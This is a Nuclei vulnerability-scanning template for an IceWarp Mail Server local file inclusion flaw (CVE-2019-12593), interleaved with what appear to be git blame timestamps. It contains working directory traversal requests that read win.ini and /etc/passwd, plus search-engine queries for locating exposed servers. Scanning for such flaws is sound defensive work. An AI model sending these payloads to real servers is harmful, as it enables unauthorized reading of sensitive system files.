2021-01-02 04:59:06 +00:00
id : CVE-2019-12593
2020-09-05 06:49:58 +00:00
info :
2022-06-17 16:23:53 +00:00
name : IceWarp Mail Server <=10.4.4 - Local File Inclusion
2020-09-05 06:49:58 +00:00
author : pikpikcu
2020-09-05 07:11:21 +00:00
severity : high
2022-06-20 17:31:28 +00:00
description : |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
2021-08-19 13:17:27 +00:00
reference :
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
2022-02-21 18:33:16 +00:00
- http://www.icewarp.com
2022-06-15 13:15:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
2024-03-23 09:28:19 +00:00
- https://github.com/sobinge/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-12593
cwe-id : CWE-22
2024-05-31 19:23:20 +00:00
epss-score : 0.07016
epss-percentile : 0.93948
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
2021-09-16 15:54:33 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : icewarp
product : mail_server
2023-09-06 12:53:28 +00:00
shodan-query : title:"icewarp"
google-query : Powered By IceWarp 10.4.4
2024-05-31 19:23:20 +00:00
fofa-query : title="icewarp server administration"
2024-01-14 09:21:50 +00:00
tags : cve,cve2019,packetstorm,lfi,icewarp
2020-09-05 06:49:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-05 06:49:58 +00:00
- method : GET
path :
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition : and
matchers :
- type : word
words :
- "[intl]"
2022-01-04 19:34:16 +00:00
- "root:x:0"
2022-06-15 13:15:42 +00:00
2022-06-20 17:31:28 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a004730450221008a481705db6d037ce5f8778e45effa8d6e32a5fb048e8e395ec718c9d093875a022010e39ff22300fc22de65d341cea7fb009e75f65dd8ddba32e9d1b68e6ec722a0:922c64590222798bb761d5b6d8e72950